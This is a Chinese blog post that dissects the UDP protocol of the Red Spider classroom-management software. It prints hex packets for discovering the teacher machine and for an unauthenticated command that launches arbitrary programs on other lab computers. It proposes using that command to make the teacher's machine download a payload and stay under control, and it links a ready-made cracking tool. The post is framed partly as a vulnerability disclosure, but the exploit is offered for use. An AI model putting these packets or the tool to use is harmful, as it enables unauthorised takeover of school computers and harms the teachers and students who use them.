文档章节

红蜘蛛协议解析及破解工具

o
 osc_g8254g7s
发布于 2019/08/19 17:03
字数 766
阅读 5
收藏 0

钉钉、微博极速扩容黑科技,点击观看阿里云弹性计算年度发布会!>>>

需要破解工具的直接到最下面即可

希望红蜘蛛能尽快修复此漏洞

前几天见到同学上微机课时使用一软件成功破解红蜘蛛客户端,并反向控制老师,感觉十分NB,于是研究了一下红蜘蛛的通信协议,准备做个补丁。结果发现红蜘蛛协议居然有致命漏洞。特此发出。

教师端检测部分

使用Xcap进行抓包,上面这张图片是红蜘蛛探测教师端的包和教师端回复的包。

包采用UDP传输,数据为:

10 01 00 00 A0 05 00 00 1C 10 00 00 40 00
然后为计算机名 再然后为带空格计算机名 
然后一直到1482都是00
如果懒得专门个性化包,可以这样发包:
10 01 00 00 A0 05
00 00 1C 10 00 00 40 00 50 52 43 2D 32 30 31 39
30 37 30 38 51 44 53 00 00 00 FF FF FF FF 0A 00
27 00 00 12 00 00 B6 06 00 00 50 00 52 00 43 00
2D 00 32 00 30 00 31 00 39 00 30 00 37 00 30 00
38 00 51 00 44 00 53 00 00 00 00 00 00 00 00 00
然后一直到1482都是00

 如果学生端成功收到回复,则登记教师端。

发送命令部分

此为启动IE浏览器的数据包,也是采用UDP协议。这里的 IEXPLORER.EXE可以替换成其他的应用名。而这么重要的包居然没有密码验证,我说的致命漏洞就在这里。如果使用这条命令使另一学生端下载网上PAYLOAD,就会被控制。就算你不是教师端而是学生端也可以以此命令控制微机室里的教师机或学生机。学生机倒是没事,但是教师机控制了因为没有硬件还原卡所以说每节课都会运行。比一般的木马都简单。

至于数据:

1 10 0D 00 00 40 04 00 00 00 00 00 01 00 00 10
2 C0 A8 38 01 6F 00 70 00 65 6E 00 00 00 00 00
3 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 
4 这里开始就是应用信息了,注意两个字符之间要有一个 00。

 

这个数据包的大小是1482,也就是说应用信息之后还要填到1482。

允许发送信息

为什么还要写这个呢?因为黑客可以通过发送信息的方法检测出教师端IP。

数据是:

1 10 0D 00 00 18 00 00 00 00 00 00 00 00 04 00 00
2 FF FF FF FF C0 A8 38 66

这个数据包大小就不是1482了后面不要补零了。

最终部分

终于到了工具部分了,工具链接如下:

工具仅供研究使用,请24小时内自觉删除

下载站转发请保留本页面链接,谢谢!

链接:https://pan.baidu.com/s/1WdDhg6Y3gJ8W6V4Emy-9UA
提取码:c4ax

如果还有其他建议请评论,谢谢

o
粉丝 0
博文 500
码字总数 0
作品 0
私信 提问
加载中
请先登录后再评论。

暂无文章

SO_REUSEADDR和SO_REUSEPORT有何不同? - How do SO_REUSEADDR and SO_REUSEPORT differ?

问题: The man pages and programmer documentations for the socket options SO_REUSEADDR and SO_REUSEPORT are different for different operating systems and often highly confusing.......

法国红酒甜
38分钟前
28
0
asp.net core之SignalR

SignalR 是什么? ASP.NET Core SignalR 是一个开源的实时框架,它简化了向应用中添加实时 Web 功能的过程。 实时 Web 功能是服务器端能够即时的将数据推送到客户端,而无需让服务器等待客户端...

一介草民Coder
今天
24
0
如何通过日期属性对数组进行排序 - How to sort an array by a date property

问题: Say I have an array of a few objects: 说我有一些对象的数组: var array = [{id: 1, date: Mar 12 2012 10:00:00 AM}, {id: 2, date: Mar 8 2012 08:00:00 AM}]; How can I sort......

javail
今天
22
0
技术教程| 百度鹰眼历史轨迹查询:轨迹抽稀功能

本文作者:用****9 本篇教程中,我们将详细地说明鹰眼历史轨迹查询(gettrack接口)中,如何通过vacuate_grade选项对轨迹进行抽稀,以及不同的抽稀力度对轨迹产生的影响。 上一篇教程中,我们...

百度开发者中心
前天
24
0
Quartz的Misfire处理规则 错过任务执行时间的处理机制

调度(scheduleJob)或恢复调度(resumeTrigger,resumeJob)后不同的misfire对应的处理规则 CronTrigger withMisfireHandlingInstructionDoNothing ——不触发立即执行 ——等待下次Cron触发频率...

独钓渔
今天
7
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部